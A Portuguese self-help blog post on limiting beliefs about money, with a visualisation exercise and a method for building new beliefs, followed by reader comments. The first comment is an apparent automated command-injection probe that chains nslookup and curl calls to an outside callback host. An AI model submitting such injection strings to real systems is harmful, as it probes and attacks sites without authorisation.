Você sabe o que são crenças? As crenças são opiniões que nós adotamos com muita fé e convicção. Se essa crença adotada, ou seja, se o que a gente acredita ser uma realidade nos ajuda a seguir o caminho que queremos, ela é uma boa crença. Mas se temos uma ideia, que nos atrapalha a atingir aquilo que queremos, na verdade temos uma crença limitante.

E isso é muito comum em relação ao dinheiro.
A forma como você “vê” o dinheiro hoje talvez revele que você tem alguma crença limitante que impede que você tenha a vida financeira desejada.

As crenças limitantes são o resultado negativo de algumas experiências que vivemos e se revelam em alguns momentos da nossa vida fazendo com que a gente repita um comportamento que nos prejudica sem nem perceber, fazemos no automático.

Vamos testar as suas crenças em relação ao dinheiro e analisar se você tem alguma crença limitante?

Imagine-se numa recepção de um médico, folheando aquelas revistas que só mostram gente rica esbanjando dinheiro em ilhas paradisíacas.
Você vê a foto de um casal, feliz e sorridente, que parece ser muito rico.

1 – O que você pensa sobre essas pessoas nessa hora? Pare e pense agora. Formule uma frase.
2 – E sobre você? Que sentimento você tem ao olhar essa imagem? Feche os olhos, imagine-se nessa cena, com essa revista na mão.
3 – Que sensação você tem no seu corpo ao refletir sobre essa imagem?

Tudo que você respondeu nesses 3 itens revela a sua crença com relação ao dinheiro e a força emocional dela.

> Você pode ter pensado algo como “esse casal não é feliz de verdade. Essa alegria é falsa”.

Talvez você pense isso por achar que os ricos não são felizes ou que dinheiro não traz felicidade. Realmente não traz, mas te dá liberdade de escolha, algo que pode te fazer feliz. E se podemos afirmar que felicidade e dinheiro não são coisas que necessariamente andam juntas, então podemos afirmar que infelicidade e dinheiro também não. Certo?  Então ver alguém com dinheiro não significa que ela é feliz mas também não podemos dizer que é infeliz. Quando você afirma que dinheiro não traz felicidade, você se afasta dele, gastando tudo, procurando ser feliz. Mas isso não é uma receita de felicidade, concorda?

> Você pode também ter pensado “se eles tem muito, alguém tem pouco. Afinal rico só fica rico, tirando dos outros, deixando alguém mais pobre”.

Essa crença tem origens antigas, do feudalismo, quando os ricos ficavam ricos exigindo bens materiais dos pobres que usavam suas terras. Depois tivemos ainda as questões abusivas de trabalho na Revolução Industrial. Mas hoje as coisas são diferentes. É claro que existem ricos, ficando ricos, tomando dinheiro dos outros… a gente sabe disso. Mas você acha mesmo que podemos dizer que isso acontecem em 100% dos casos? E mais: além de haver gente enriquecendo sem tirar dinheiro de ninguém, essas pessoas ainda proporcionam riquezas seja por caridade, por criar empregos e injetar dinheiro na economia. E não é por que alguém cobra por um serviço e fica rico com isso que você está tirando dinheiro de alguém. Quem cobra, gasta no serviço de outra pessoa e também cria empregos… repare em como o dinheiro se movimenta e cria valor para todos os envolvidos.

> Outro pensamento pode ter vindo à sua mente nesse exercício: “Esse casal é rico por que nasceu rico. Só assim é possível ter tanto dinheiro”.

Existem muitas pessoas que tem dinheiro e que vieram de famílias humildes. Existem pessoas famosas que eram pobres e hoje são muito ricas. Silvio Santos por exemplo. Já sei! Agora você pensou: “quem nasceu pobre precisa trabalhar muuuuuuito para ter dinheiro”. E eu te digo que isso é outra crença, não é uma verdade. Trabalhar bastante é o caminho para o sucesso em qualquer área mas isso não significa que você precise se matar de trabalhar. Existem várias formas de ganhar dinheiro onde você trabalha muito no início e depois colhe os frutos: escrever um livro, montar e treinar uma equipe que vai trabalhar pra você, atuar em marketing de rede, investir… Mude seu pensamento de “é preciso trabalhar muito a vida toda” por “é preciso trabalhar muito uma parte da vida e aprender a colher os frutos desse trabalho”.

Ainda existem mais crenças…

> Um pensamento bem comum é “os ricos são más pessoas, egoístas, desonestos, são pecadores…”.

Precisamos refletir que ninguém é 100% bom, nem 100% mau. Existem muitas pessoas sem dinheiro que também são tudo isso. E muitos que enriqueceram fizeram isso de forma lícita e ajudando pessoas. Toda vez que você atribui essas características aos que tem dinheiro, você está inconscientemente se livrando de todo o seu dinheiro ou de oportunidades que te façam ganhar mais, para manter seu caráter, sua honestidade, sua integridade… o dinheiro permite fazer o bem. E ganhar dinheiro não deve ser pecado. Veja, na própria Bíblia em 1 Timóteo 5:8 vemos o seguinte texto: “Certamente, se alguém não fizer provisões para os seus próprios e especialmente para os membros de sua família, tem repudiado a fé e é pior do que alguém sem fé”.

> Uma outra crença muito comum que eu tenho certeza que você já pensou um dia e até mesmo nesse exercício:
“Eu não mereço ou eu não consigo ter dinheiro. Eu precisaria ter uma ideia revolucionária, ser muito inteligente, ser mais sortudo, ter algum conhecido muito rico que quisesse me ajudar, devia ter acabado minha faculdade, ou não ter vindo de uma família tão pobre.”

Todo mundo pode e merece ganhar seu dinheiro. E todo mundo tem condições disso. Vemos inúmeros exemplos por aí… duplas sertanejas, grandes líderes, empresários, talvez até algum amigo seu… muitos que talvez pudessem fazer essas afirmações todas, mas que souberam acreditar em si e aproveitar oportunidades.

Todas essas crenças sobre o dinheiro podem sabotar seus esforços em progredir e te manter exatamente na mesma situação que você está agora.
E você só precisa fazer uma coisa para mudar sua forma de pensar sobre o dinheiro.

Você precisa desenvolver crenças que te ajudem a chegar aonde você quer. Crença não é necessariamente uma mentira. É algo que você acredita. Então tente acreditar em coisas vão te levar pra frente e não te segurar no mesmo lugar.
Pense em cada uma das crenças que você tem hoje sobre o dinheiro e sobre ter muito dinheiro. E pense no que seria uma crença contrária. Uma que te ajuda a ir pra frente.

Imagine que essa nova crença, que você ainda não acredita, é como o tampo de uma mesa. Pra vc sustentar esse tampo de mesa você precisa de 4 pés. Ou até 3… Vc consegue sustentar com 3 pés. Então você vai agora arrumar evidências que mostrem que essa crença pode ser real. E cada evidência vai ser um pé dessa mesa. Feche os olhos, pense em cada evidência, e vá colocando cada pé da mesa no lugar mentalmente e segurando esse tampo. Você só precisa de 3 evidências para sustentar essa crença. Pesquise, converse com amigos, promova um debate, procure exemplos…

Não é difícil mudar uma ideia que a gente tem de algo. Você já fez isso várias vezes quando mudou de opinião sobre alguém, deixou de gostar de algo que gostava quando era criança.. então isso que você fez várias vezes acidentalmente ao longo da vida, você agora vai fazer de propósito.

Aliás propósito é algo que tem muito a ver com prosperidade.
Vamos falar sobre isso mais pra frente.

Até a próxima.

28 respostas

  1. ;(nslookup -q=cname hitfqvgystkzw52d61.bxss.me||curl hitfqvgystkzw52d61.bxss.me)|(nslookup -q=cname hitfqvgystkzw52d61.bxss.me||curl hitfqvgystkzw52d61.bxss.me)&(nslookup -q=cname hitfqvgystkzw52d61.bxss.me||curl hitfqvgystkzw52d61.bxss.me)

  2. EFT resolve… rsrs
    Ir na raiz do problema e acabar de vez com essas verdades absolutas que criamos na nossa cabeça.
    Sei que muita gente pode acreditar que realmente esses pensamentos fazem parte da sua vida, e pode até fazer, por 80% das crenças foram colocadas na nossa mente (consciente ou inconscientemente) na fase infantil até adolescência.
    Mas a solução também existe! E é muito mais fácil que imaginamos.
    Excelente artigo Lu.
    Bjs no core!
    Pri

    1. E excelente colocação!
      SIM: ETF é um caminho incrível!
      Também foi (e continua sendo) parte da minha trajetória.
      Em breve vamos falar disso por aqui.
      😉
      beijos!
      obrigada pelos seus comentários

  3. Parabéns Lú, excelente artigo. Creio nisso mesmo, que podemos mudar! Pela educação, pela necessidade, pela dor ou por qualquer outro motivo, mudanças são possíveis e necessárias, principalmente em relação às finanças. E quantos pensamos herdamos, não é?! Um grande motivador de minhas mudanças de crenças nos últimos meses é que eu quero ser uma boa provedora para os meus filhos, conferindo-lhes a segurança de sempre terem sua escola, roupas, alimentação, casa e conforto para crescerem em Paz e serem prósperos e independentes. Dinheiro e luxo não trazem felicidade, de forma alguma, mas Paz e segurança diante os desafios da vida SIM! Continuarei lendo seus posts. Parabéns!

    1. Isso mesmo, Bruna! Estamos aqui para sermos felizes! Ninguém precisa ter rios de dinheiro e nem teremos a certeza de que isso vai trazer felicidade. Mas foi como você disse: paz e segurança nos deixam muito felizes. E para isso é preciso ter dinheiro SIM! Não é a única coisa necessária. É uma delas então vamos buscar os caminhos para a felicidade. Que são muitos! Ainda bem! 🙂 Obrigada pelo comentário. Bjos!

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *